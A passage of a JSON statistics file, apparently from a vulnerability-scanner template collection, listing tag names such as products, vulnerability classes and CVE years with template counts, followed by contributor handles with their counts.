count":24},{"name":"generic","count":24},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"misconfig","count":23},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"php","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":15},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"deserialization","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"magento","count":11},{"name":"xxe","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"fastjson","count":8},{"name":"backup","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"nginx","count":8},{"name":"gitlab","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"phpmyadmin","count":6},{"name":"camera","count":6},{"name":"jetty","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"fileupload","count":6},{"name":"nodejs","count":6},{"name":"prometheus","count":6},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"wso2","count":5},{"name":"crlf","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"printer","count":5},{"name":"symfony","count":5},{"name":"tomcat","count":5},{"name":"jolokia","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"artifactory","count":4},{"name":"fatpipe","count":4},{"name":"proxy","count":4},{"name":"zimbra","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"rfi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"microstrategy","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"firebase","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"webserver","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"thinkcmf","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"strapi","count":4},{"name":"firmware","count":4},{"name":"symantec","count":4},{"name":"npm","count":4},{"name":"glpi","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"solarwinds","count":4},{"name":"zabbix","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"tikiwiki","count":3},{"name":"httpd","count":3},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"telerik","count":3},{"name":"openam","count":3},{"name":"lfr","count":3},{"name":"cacti","count":3},{"name":"jeesns","count":3},{"name":"bigip","count":3},{"name":"minio","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"exposures","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"openssh","count":3},{"name":"node","count":3},{"name":"springcloud","count":3},{"name":"druid","count":3},{"name":"github","count":3},{"name":"backdoor","count":3},{"name":"kafka","count":3},{"name":"caucho","count":3},{"name":"opensis","count":3},{"name":"ssh","count":3},{"name":"sonicwall","count":3},{"name":"log","count":3},{"name":"jellyfin","count":3},{"name":"itop","count":3},{"name":"kevinlab","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"cves","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"linkerd","count":3},{"name":"bitrix","count":3},{"name":"cloud","count":3},{"name":"mail","count":3},{"name":"mongodb","count":3},{"name":"smtp","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"hoteldruid","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"kibana","count":3},{"name":"targa","count":3},{"name":"terramaster","count":3},{"name":"injection","count":3},{"name":"hasura","count":2},{"name":"commax","count":2},{"name":"horde","count":2},{"name":"dolibarr","count":2},{"name":"spark","count":2},{"name":"waf","count":2},{"name":"text","count":2},{"name":"nextcloud","count":2},{"name":"openvpn","count":2},{"name":"pega","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"harbor","count":2},{"name":"bucket","count":2},{"name":"aviatrix","count":2},{"name":"axis","count":2},{"name":"akamai","count":2},{"name":"ilo","count":2},{"name":"jsf","count":2},{"name":"dos","count":2},{"name":"phpcollab","count":2},{"name":"places","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"ecoa","count":2},{"name":"s3","count":2},{"name":"nagios","count":2},{"name":"linux","count":2},{"name":"wuzhicms","count":2},{"name":"voipmonitor","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"kentico","count":2},{"name":"jboss","count":2},{"name":"enumeration","count":2},{"name":"odoo","count":2},{"name":"electron","count":2},{"name":"smb","count":2},{"name":"ucmdb","count":2},{"name":"vcenter","count":2},{"name":"grav","count":2},{"name":"bruteforce","count":2},{"name":"xxljob","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"hjtcloud","count":2},{"name":"lotus","count":2},{"name":"payara","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"status","count":2},{"name":"huawei","count":2},{"name":"getsimple","count":2},{"name":"mailchimp","count":2},{"name":"aspose","count":2},{"name":"akkadian","count":2},{"name":"justwriting","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"rancher","count":2},{"name":"totemomail","count":2},{"name":"geowebserver","count":2},{"name":"cve2005","count":2},{"name":"sitecore","count":2},{"name":"mcafee","count":2},{"name":"nextjs","count":2},{"name":"backups","count":2},{"name":"chamilo","count":2},{"name":"prestashop","count":2},{"name":"icewarp","count":2},{"name":"flir","count":2},{"name":"bitly","count":2},{"name":"qihang","count":2},{"name":"trixbox","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"avantfax","count":2},{"name":"ec2","count":2},{"name":"hashicorp","count":2},{"name":"aruba","count":2},{"name":"splunk","count":2},{"name":"showdoc","count":2},{"name":"bypass","count":2},{"name":"paloalto","count":2},{"name":"netis","count":2},{"name":"natshell","count":2},{"name":"glassfish","count":2},{"name":"guacamole","count":2},{"name":"sharepoint","count":2},{"name":"cache","count":2},{"name":"heroku","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"adminer","count":2},{"name":"chiyu","count":2},{"name":"axis2","count":2},{"name":"sonarqube","count":2},{"name":"kong","count":2},{"name":"emerge","count":2},{"name":"tidb","count":2},{"name":"upload","count":2},{"name":"oauth","count":2},{"name":"db","count":2},{"name":"favicon","count":2},{"name":"liferay","count":2},{"name":"saltstack","count":2},{"name":"chyrp","count":2},{"name":"middleware","count":2},{"name":"frp","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"yapi","count":2},{"name":"storage","count":2},{"name":"idrac","count":2},{"name":"monitorix","count":1},{"name":"moinmoin","count":1},{"name":"maccmsv10","count":1},{"name":"sgp","count":1},{"name":"buttercms","count":1},{"name":"twitter","count":1},{"name":"ghost","count":1},{"name":"monitorr","count":1},{"name":"burp","count":1},{"name":"viewlinc","count":1},{"name":"webmodule-ee","count":1},{"name":"scs","count":1},{"name":"accela","count":1},{"name":"labtech","count":1},{"name":"tracer","count":1},{"name":"crm","count":1},{"name":"zookeeper","count":1},{"name":"asus","count":1},{"name":"woocomernce","count":1},{"name":"zeroshell","count":1},{"name":"nifi","count":1},{"name":"influxdb","count":1},{"name":"upnp","count":1},{"name":"zarafa","count":1},{"name":"zend","count":1},{"name":"instagram","count":1},{"name":"robomongo","count":1},{"name":"yachtcontrol","count":1},{"name":"sophos","count":1},{"name":"qdpm","count":1},{"name":"emby","count":1},{"name":"huijietong","count":1},{"name":"springframework","count":1},{"name":"xml","count":1},{"name":"route","count":1},{"name":"fcm","count":1},{"name":"ricoh","count":1},{"name":"adiscon","count":1},{"name":"mantisbt","count":1},{"name":"cyberoam","count":1},{"name":"ipstack","count":1},{"name":"myucms","count":1},{"name":"emc","count":1},{"name":"ambari","count":1},{"name":"octobercms","count":1},{"name":"tjws","count":1},{"name":"contentkeeper","count":1},{"name":"spring","count":1},{"name":"servicenow","count":1},{"name":"expn","count":1},{"name":"opentsdb","count":1},{"name":"mongo","count":1},{"name":"linkedin","count":1},{"name":"totaljs","count":1},{"name":"olivetti","count":1},{"name":"basic-auth","count":1},{"name":"tenda","count":1},{"name":"tcexam","count":1},{"name":"xunchi","count":1},{"name":"erp-nc","count":1},{"name":"powercreator","count":1},{"name":"esmtp","count":1},{"name":"mantis","count":1},{"name":"servicedesk","count":1},{"name":"nps","count":1},{"name":"phalcon","count":1},{"name":"lutron","count":1},{"name":"jenzabar","count":1},{"name":"javascript","count":1},{"name":"listserv","count":1},{"name":"sarg","count":1},{"name":"avtech","count":1},{"name":"blackboard","count":1},{"name":"mapbox","count":1},{"name":"bolt","count":1},{"name":"exponentcms","count":1},{"name":"skycaiji","count":1},{"name":"bazarr","count":1},{"name":"database","count":1},{"name":"jsp","count":1},{"name":"nedi","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"etouch","count":1},{"name":"opm","count":1},{"name":"landray","count":1},{"name":"circle","count":1},{"name":"traefik","count":1},{"name":"clickhouse","count":1},{"name":"tectuus","count":1},{"name":"razor","count":1},{"name":"jenkin","count":1},{"name":"74cms","count":1},{"name":"argussurveillance","count":1},{"name":"minimouse","count":1},{"name":"realteo","count":1},{"name":"pihole","count":1},{"name":"nerdgraph","count":1},{"name":"nearby","count":1},{"name":"beanshell","count":1},{"name":"synnefo","count":1},{"name":"concrete","count":1},{"name":"rubedo","count":1},{"name":"bullwark","count":1},{"name":"openweather","count":1},{"name":"webui","count":1},{"name":"javafaces","count":1},{"name":"mediumish","count":1},{"name":"clockwork","count":1},{"name":"mirai","count":1},{"name":"cherokee","count":1},{"name":"rockethchat","count":1},{"name":"weglot","count":1},{"name":"memcached","count":1},{"name":"elfinder","count":1},{"name":"autocomplete","count":1},{"name":"smi","count":1},{"name":"jfrog","count":1},{"name":"oidc","count":1},{"name":"pagerduty","count":1},{"name":"avalanche","count":1},{"name":"uwsgi","count":1},{"name":"buildkite","count":1},{"name":"biometrics","count":1},{"name":"gloo","count":1},{"name":"tinypng","count":1},{"name":"jaspersoft","count":1},{"name":"qsan","count":1},{"name":"centreon","count":1},{"name":"expose","count":1},{"name":"sceditor","count":1},{"name":"ems","count":1},{"name":"jnoj","count":1},{"name":"weather","count":1},{"name":"plugin","count":1},{"name":"xmlchart","count":1},{"name":"opensmtpd","count":1},{"name":"xiuno","count":1},{"name":"wamp","count":1},{"name":"miscrsoft","count":1},{"name":"seacms","count":1},{"name":"bookstack","count":1},{"name":"ganglia","count":1},{"name":"domxss","count":1},{"name":"hadoop","count":1},{"name":"mdb","count":1},{"name":"spip","count":1},{"name":"blind","count":1},{"name":"geutebruck","count":1},{"name":"wavemaker","count":1},{"name":"loqate","count":1},{"name":"achecker","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bingmaps","count":1},{"name":"wildfly","count":1},{"name":"ns","count":1},{"name":"photo","count":1},{"name":"hortonworks","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"kubeflow","count":1},{"name":"apiman","count":1},{"name":"secmail","count":1},{"name":"discourse","count":1},{"name":"elascticsearch","count":1},{"name":"werkzeug","count":1},{"name":"pyramid","count":1},{"name":"addpac","count":1},{"name":"iceflow","count":1},{"name":"roads","count":1},{"name":"dnssec","count":1},{"name":"tika","count":1},{"name":"jeewms","count":1},{"name":"phpshowtime","count":1},{"name":"streetview","count":1},{"name":"stripe","count":1},{"name":"froxlor","count":1},{"name":"sqlite","count":1},{"name":"tugboat","count":1},{"name":"playable","count":1},{"name":"websphere","count":1},{"name":"mod-proxy","count":1},{"name":"directions","count":1},{"name":"jquery","count":1},{"name":"klog","count":1},{"name":"gespage","count":1},{"name":"javamelody","count":1},{"name":"chinaunicom","count":1},{"name":"circontrorl","count":1},{"name":"zcms","count":1},{"name":"shiro","count":1},{"name":"kafdrop","count":1},{"name":"phpfastcache","count":1},{"name":"ewebs","count":1},{"name":"craftcms","count":1},{"name":"cockpit","count":1},{"name":"whm","count":1},{"name":"flexbe","count":1},{"name":"parentlink","count":1},{"name":"elasticsearch","count":1},{"name":"geocode","count":1},{"name":"elevation","count":1},{"name":"cobub","count":1},{"name":"wakatime","count":1},{"name":"artica","count":1},{"name":"xmpp","count":1},{"name":"couchbase","count":1},{"name":"checkpoint","count":1},{"name":"xvr","count":1},{"name":"openx","count":1},{"name":"rsyncd","count":1},{"name":"phpunit","count":1},{"name":"wmt","count":1},{"name":"appweb","count":1},{"name":"zm","count":1},{"name":"cloudinary","count":1},{"name":"b2evolution","count":1},{"name":"luftguitar","count":1},{"name":"sar2html","count":1},{"name":"clusterengine","count":1},{"name":"turbocrm","count":1},{"name":"fortigates","count":1},{"name":"triconsole","count":1},{"name":"sprintful","count":1},{"name":"ecom","count":1},{"name":"redwood","count":1},{"name":"eyelock","count":1},{"name":"tor","count":1},{"name":"visualstudio","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"fiori","count":1},{"name":"clave","count":1},{"name":"ulterius","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"gitlist","count":1},{"name":"cocoon","count":1},{"name":"bedita","count":1},{"name":"bing","count":1},{"name":"interlib","count":1},{"name":"dom","count":1},{"name":"ognl","count":1},{"name":"kindeditor","count":1},{"name":"beanstalk","count":1},{"name":"dbeaver","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"details","count":1},{"name":"krweb","count":1},{"name":"travis","count":1},{"name":"asana","count":1},{"name":"owa","count":1},{"name":"gridx","count":1},{"name":"testrail","count":1},{"name":"alerta","count":1},{"name":"redcap","count":1},{"name":"panabit","count":1},{"name":"netrc","count":1},{"name":"feifeicms","count":1},{"name":"clockwatch","count":1},{"name":"wondercms","count":1},{"name":"opensns","count":1},{"name":"starttls","count":1},{"name":"dotnet","count":1},{"name":"mkdocs","count":1},{"name":"rabbitmq","count":1},{"name":"myvuehelp","count":1},{"name":"sql","count":1},{"name":"iterable","count":1},{"name":"newrelic","count":1},{"name":"plastic","count":1},{"name":"diris","count":1},{"name":"square","count":1},{"name":"acexy","count":1},{"name":"k8","count":1},{"name":"salesforce","count":1},{"name":"find","count":1},{"name":"alibaba","count":1},{"name":"shoppable","count":1},{"name":"ruckus","count":1},{"name":"cgi","count":1},{"name":"lokalise","count":1},{"name":"imap","count":1},{"name":"webftp","count":1},{"name":"dvr","count":1},{"name":"shopware","count":1},{"name":"ssltls","count":1},{"name":"dotclear","count":1},{"name":"axiom","count":1},{"name":"bash","count":1},{"name":"novnc","count":1},{"name":"manager","count":1},{"name":"nsasg","count":1},{"name":"raspap","count":1},{"name":"sourcebans","count":1},{"name":"blue-ocean","count":1},{"name":"flink","count":1},{"name":"nc2","count":1},{"name":"glances","count":1},{"name":"htmli","count":1},{"name":"svnserve","count":1},{"name":"cloudflare","count":1},{"name":"auth","count":1},{"name":"eg","count":1},{"name":"k8s","count":1},{"name":"tamronos","count":1},{"name":"solman","count":1},{"name":"netmask","count":1},{"name":"primetek","count":1},{"name":"cves2001","count":1},{"name":"pgadmin","count":1},{"name":"simplecrm","count":1},{"name":"vsphere","count":1},{"name":"speed","count":1},{"name":"redis","count":1},{"name":"adb","count":1},{"name":"twitter-server","count":1},{"name":"socomec","count":1},{"name":"pacsone","count":1},{"name":"oscommerce","count":1},{"name":"gilacms","count":1},{"name":"shoretel","count":1},{"name":"visualtools","count":1},{"name":"gstorage","count":1},{"name":"rdp","count":1},{"name":"mongoshake","count":1},{"name":"jitsi","count":1},{"name":"ntopng","count":1},{"name":"pcoip","count":1},{"name":"openerp","count":1},{"name":"ueditor","count":1},{"name":"terraform","count":1},{"name":"nette","count":1},{"name":"magicflow","count":1},{"name":"lg-nas","count":1},{"name":"karel","count":1},{"name":"shopxo","count":1},{"name":"wavlink","count":1},{"name":"xampp","count":1},{"name":"wiki","count":1},{"name":"clink-office","count":1},{"name":"opencast","count":1},{"name":"gotmls","count":1},{"name":"rmi","count":1},{"name":"nuxeo","count":1},{"name":"keenetic","count":1},{"name":"commscope","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"floc","count":1},{"name":"sidekiq","count":1},{"name":"shopizer","count":1},{"name":"grails","count":1},{"name":"meraki","count":1},{"name":"syslog","count":1},{"name":"sco","count":1},{"name":"dotnetnuke","count":1},{"name":"resourcespace","count":1},{"name":"vnc","count":1},{"name":"sangfor","count":1},{"name":"majordomo2","count":1},{"name":"cors","count":1},{"name":"setup","count":1},{"name":"metabase","count":1},{"name":"proftpd","count":1},{"name":"trilithic","count":1},{"name":"email","count":1},{"name":"key","count":1},{"name":"cscart","count":1},{"name":"default","count":1},{"name":"sureline","count":1},{"name":"aura","count":1},{"name":"tpshop","count":1},{"name":"centos","count":1},{"name":"mailgun","count":1},{"name":"visionhub","count":1},{"name":"openstack","count":1},{"name":"faraday","count":1},{"name":"cerebro","count":1},{"name":"pendo","count":1},{"name":"chevereto","count":1},{"name":"rujjie","count":1},{"name":"zmanda","count":1},{"name":"tieline","count":1},{"name":"smartblog","count":1},{"name":"remkon","count":1},{"name":"csrfguard","count":1},{"name":"subrion","count":1},{"name":"woocommerce","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"optiLink","count":1},{"name":"jabber","count":1},{"name":"graphql","count":1},{"name":"tapestry","count":1},{"name":"spf","count":1},{"name":"fastapi","count":1},{"name":"hiawatha","count":1},{"name":"stem","count":1},{"name":"zyxel","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"loganalyzer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"redmine","count":1},{"name":"finereport","count":1},{"name":"sage","count":1},{"name":"wifisky","count":1},{"name":"nomad","count":1},{"name":"circontrol","count":1},{"name":"szhe","count":1},{"name":"tongda","count":1},{"name":"gsoap","count":1},{"name":"fuelcms","count":1},{"name":"spidercontrol","count":1},{"name":"phpinfo","count":1},{"name":"frontpage","count":1},{"name":"camunda","count":1},{"name":"mobileiron","count":1},{"name":"api-manager","count":1},{"name":"matrix","count":1},{"name":"wing-ftp","count":1},{"name":"place","count":1},{"name":"selea","count":1},{"name":"wazuh","count":1},{"name":"mpsec","count":1},{"name":"youtube","count":1},{"name":"actuator","count":1},{"name":"cloudron","count":1},{"name":"lotuscms","count":1},{"name":"mrtg","count":1},{"name":"package","count":1},{"name":"sonarcloud","count":1},{"name":"oneblog","count":1},{"name":"graylog","count":1},{"name":"h3c-imc","count":1},{"name":"qvisdvr","count":1},{"name":"websvn","count":1},{"name":"svn","count":1},{"name":"zte","count":1},{"name":"geolocation","count":1},{"name":"solarlog","count":1},{"name":"expressjs","count":1},{"name":"thinkadmin","count":1},{"name":"apos","count":1},{"name":"rocketchat","count":1},{"name":"livezilla","count":1},{"name":"timezone","count":1},{"name":"tensorboard","count":1},{"name":"zenario","count":1},{"name":"csod","count":1},{"name":"messaging","count":1},{"name":"haproxy","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"digitalocean","count":1},{"name":"hubspot","count":1},{"name":"circleci","count":1},{"name":"sentry","count":1},{"name":"fortinet","count":1},{"name":"webmin","count":1},{"name":"episerver","count":1},{"name":"spotify","count":1},{"name":"locations","count":1},{"name":"redhat","count":1},{"name":"comodo","count":1},{"name":"timeclock","count":1},{"name":"mysql","count":1},{"name":"fedora","count":1},{"name":"linksys","count":1},{"name":"acme","count":1},{"name":"gunicorn","count":1},{"name":"codeigniter","count":1},{"name":"pagespeed","count":1},{"name":"cse","count":1},{"name":"nexusdb","count":1},{"name":"varnish","count":1},{"name":"eprints","count":1},{"name":"iptime","count":1},{"name":"okta","count":1},{"name":"postmark","count":1},{"name":"owasp","count":1},{"name":"fortilogger","count":1},{"name":"jumpcloud","count":1},{"name":"postmessage","count":1},{"name":"dahua","count":1},{"name":"phpwiki","count":1},{"name":"gitea","count":1},{"name":"metinfo","count":1},{"name":"darkstat","count":1},{"name":"rhymix","count":1},{"name":"pippoint","count":1},{"name":"jmx","count":1},{"name":"fortiweb","count":1},{"name":"cofax","count":1},{"name":" default-login","count":1},{"name":"st","count":1},{"name":"yzmcms","count":1},{"name":"scimono","count":1},{"name":"okiko","count":1},{"name":"graphite","count":1},{"name":"vscode","count":1},{"name":"plone","count":1},{"name":"processmaker","count":1},{"name":"logontracer","count":1},{"name":"nuuo","count":1},{"name":"mautic","count":1},{"name":"moin","count":1},{"name":"aspnuke","count":1},{"name":"limit","count":1},{"name":"trane","count":1},{"name":"webadmin","count":1},{"name":"pmb","count":1},{"name":"postgres","count":1},{"name":"lighttpd","count":1},{"name":"kerbynet","count":1},{"name":"openrestry","count":1},{"name":"dompdf","count":1},{"name":"natemail","count":1},{"name":"timesheet","count":1},{"name":"maxsite","count":1},{"name":"tensorflow","count":1},{"name":"zms","count":1},{"name":"omi","count":1},{"name":"saltapi","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"gogs","count":1},{"name":"dropbox","count":1},{"name":"office365","count":1},{"name":"soar","count":1},{"name":"pivotaltracker","count":1},{"name":"hiboss","count":1},{"name":"landrayoa","count":1},{"name":"pulsesecure","count":1},{"name":"node-red-dashboard","count":1},{"name":"deviantart","count":1},{"name":"ioncube","count":1},{"name":"ruby","count":1},{"name":"swagger","count":1},{"name":"azkaban","count":1},{"name":"bigbluebutton","count":1},{"name":"skywalking","count":1},{"name":"announcekit","count":1},{"name":"mariadb","count":1},{"name":"netdata","count":1},{"name":"gurock","count":1},{"name":"netgenie","count":1},{"name":"panasonic","count":1},{"name":"portainer","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"cve2006","count":1},{"name":"daybyday","count":1},{"name":"nordex","count":1},{"name":"etherpad","count":1},{"name":"exacqvision","count":1},{"name":"drone","count":1},{"name":"tileserver","count":1},{"name":"nimble","count":1},{"name":"yealink","count":1},{"name":"ilo4","count":1},{"name":"xdcms","count":1},{"name":"fastcgi","count":1},{"name":"kyan","count":1},{"name":"alertmanager","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"spectracom","count":1},{"name":"smartsense","count":1},{"name":"fortigate","count":1},{"name":"gateone","count":1},{"name":"cve202","count":1},{"name":"vidyo","count":1},{"name":"lancom","count":1},{"name":"nweb2fax","count":1},{"name":"extractor","count":1},{"name":"embedthis","count":1},{"name":"plc","count":1},{"name":"calendly","count":1},{"name":"ssl","count":1},{"name":"panos","count":1},{"name":"eyou","count":1},{"name":"lanproxy","count":1},{"name":"viewpoint","count":1}],"authors":[{"name":"dhiyaneshdk","count":296},{"name":"daffainfo","count":289},{"name":"pikpikcu","count":281},{"name":"pdteam","count":201},{"name":"geeknik","count":166},{"name":"dwisiswant0","count":131},{"name":"gy741","count":83},{"name":"pussycat0x","count":74},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":55},{"name":"gaurang","count":42},{"name":"philippedelteil","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":9},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"dogasantos","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"divya_mudgal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"tess","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"emenalf","count":3},{"name":"jarijaas","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"unstabl3","count":3},{"name":"sushantkamble","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"johnjhacking","count":3},{"name":"kiblyn11","count":2},{"name":"g4l1t0","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"whoever","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xsapra","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"randomrobbie","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"fabaff","count":2},{"name":"afaq","count":2},{"name":"joeldeleep","count":2},{"name":"random-robbie","count":2},{"name":"cocxanh","count":2},{"name":"nkxxkn","count":2},{"name":"davidmckennirey","count":2},{"name":"ree4pwn","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"r3naissance","count":2},{"name":"alifathi-h1","count":2},{"name":"convisoappsec","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"zomsop82","count":2},{"name":"huowuzhao","count":2},{"name":"r12w4n","count":2},{"name":"parth","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"x1m_martijn","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"gal nagli","count":2},{"name":"0xrudra","count":2},{"name":"bing0o","count":2},{"name":"ehsahil","count":2},{"name":"gevakun","count":2},{"name":"sy3omda","count":2},{"name":"mah3sec_","count":1},{"name":"ahmetpergamum","count":1},{"name":"push4d","count":1},{"name":"taielab","count":1},{"name":"mubassirpatel","count":1},{"name":"qlkwej","count":1},{"name":"forgedhallpass","count":1},{"name":"shelld3v","count":1},{"name":"0xrod","count":1},{"name":"hanlaomo","count":1},{"name":"s1r1u5_","count":1},{"name":"tim_koopmans","count":1},{"name":"toufik airane","count":1},{"name":"elmahdi","count":1},{"name":"bolli95","count":1},{"name":"ipanda","count":1},{"name":"bjhulst","count":1},{"name":"_darrenmartyn","count":1},{"name":"jrolf","count":1},{"name":"flag007","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"clarkvoss","count":1},{"name":"intx0x80","count":1},{"name":"ooooooo_q","count":1},{"name":"becivells","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"omarkurt","count":1},{"name":"akash.c","count":1},{"name":"th3.d1p4k","count":1},{"name":"fmunozs","count":1},{"name":"x6263","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"retr0","count":1},{"name":"aresx","count":1},{"name":"igibanez","count":1},{"name":"ringo","count":1},{"name":"ilovebinbash","count":1},{"name":"kareemse1im","count":1},{"name":"lethargynavigator","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"0xtavian","count":1},{"name":"pudsec","count":1},{"name":"smaranchand","count":1},{"name":"j33n1k4","count":1},{"name":"brabbit10","count":1},{"name":"ohlinge","count":1},{"name":"alph4byt3","count":1},{"name":"jeya seelan","count":1},{"name":"exploitation","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"sbani","count":1},{"name":"defr0ggy","count":1},{"name":"lark 